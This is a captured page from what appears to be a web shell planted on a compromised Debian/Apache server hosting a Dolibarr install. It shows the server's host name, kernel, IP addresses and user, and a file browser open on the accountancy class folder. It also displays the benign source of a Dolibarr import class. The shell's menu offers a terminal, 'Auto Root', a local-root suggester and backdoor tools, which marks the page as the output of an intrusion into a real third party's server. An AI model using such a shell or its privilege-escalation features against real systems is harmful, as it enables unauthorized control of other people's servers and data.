Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
gmd.bdcloud.fr /
accountancy /
class /
Delete
Unzip
Name
Size
Permission
Date
Action
accountancycategory.class.php
25.39
KB
-rw-r--r--
2022-09-27 16:06
accountancyexport.class.php
58.78
KB
-rw-r--r--
2022-09-27 16:06
accountancyimport.class.php
3.56
KB
-rw-r--r--
2022-09-27 16:06
accountancysystem.class.php
3.88
KB
-rw-r--r--
2022-09-27 16:06
accountingaccount.class.php
30.8
KB
-rw-r--r--
2022-09-27 16:06
accountingjournal.class.php
9.03
KB
-rw-r--r--
2022-09-27 16:06
bookkeeping.class.php
70.17
KB
-rw-r--r--
2022-09-27 16:06
lettering.class.php
11.3
KB
-rw-r--r--
2022-09-27 16:06
Save
Rename
<?php /* * Copyright (C) 2007-2012 Laurent Destailleur <eldy@users.sourceforge.net> * Copyright (C) 2014 Juanjo Menent <jmenent@2byte.es> * Copyright (C) 2015 Florian Henry <florian.henry@open-concept.pro> * Copyright (C) 2015 Raphaël Doursenaud <rdoursenaud@gpcsolutions.fr> * Copyright (C) 2016 Pierre-Henry Favre <phf@atm-consulting.fr> * Copyright (C) 2016-2020 Alexandre Spangaro <aspangaro@open-dsi.fr> * Copyright (C) 2013-2017 Olivier Geffroy <jeff@jeffinfo.com> * Copyright (C) 2017 Elarifr. Ari Elbaz <github@accedinfo.com> * Copyright (C) 2017-2019 Frédéric France <frederic.france@netlogic.fr> * Copyright (C) 2017 André Schild <a.schild@aarboard.ch> * Copyright (C) 2020 Guillaume Alexandre <guillaume@tag-info.fr> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ /** * \file htdocs/accountancy/class/accountancyimport.class.php * \ingroup Accountancy (Double entries) * \brief Class accountancy import */ /** * Manage the different format accountancy import */ class AccountancyImport { /** * @var DoliDB Database handler */ public $db; /** * Constructor * * @param DoliDb $db Database handler */ public function __construct(DoliDB $db) { global $conf; $this->db = $db; } /** * Compute amount * * @param array $arrayrecord Array of read values: [fieldpos] => (['val']=>val, ['type']=>-1=null,0=blank,1=string), [fieldpos+1]... * @param string $fieldname Field name with alias * @param array $listfields Fields list to add * @param array $listvalues Values list to add * @return int <0 if KO, >0 if OK */ public function computeAmount(&$arrayrecord, $fieldname, &$listfields, &$listvalues) { $fieldArr = explode('.', $fieldname); if (count($fieldArr) > 0) { $fieldname = $fieldArr[1]; } $debit = floatval(trim($arrayrecord[11]['val'])); $credit = floatval(trim($arrayrecord[12]['val'])); if (!empty($debit)) { $amount = $debit; } else { $amount = $credit; } $listfields[] = $fieldname; $listvalues[] = "'" . abs($amount) . "'"; return 1; } /** * Compute sens * * @param array $arrayrecord Array of read values: [fieldpos] => (['val']=>val, ['type']=>-1=null,0=blank,1=string), [fieldpos+1]... * @param string $fieldname Field name with alias * @param array $listfields Fields list to add * @param array $listvalues Values list to add * @return int <0 if KO, >0 if OK */ public function computeDirection(&$arrayrecord, $fieldname, &$listfields, &$listvalues) { $fieldArr = explode('.', $fieldname); if (count($fieldArr) > 0) { $fieldname = $fieldArr[1]; } $debit = floatval(trim($arrayrecord[11]['val'])); if (!empty($debit)) { $sens = 'D'; } else { $sens = 'C'; } $listfields[] = $fieldname; $listvalues[] = "'" . $sens . "'"; return 1; } }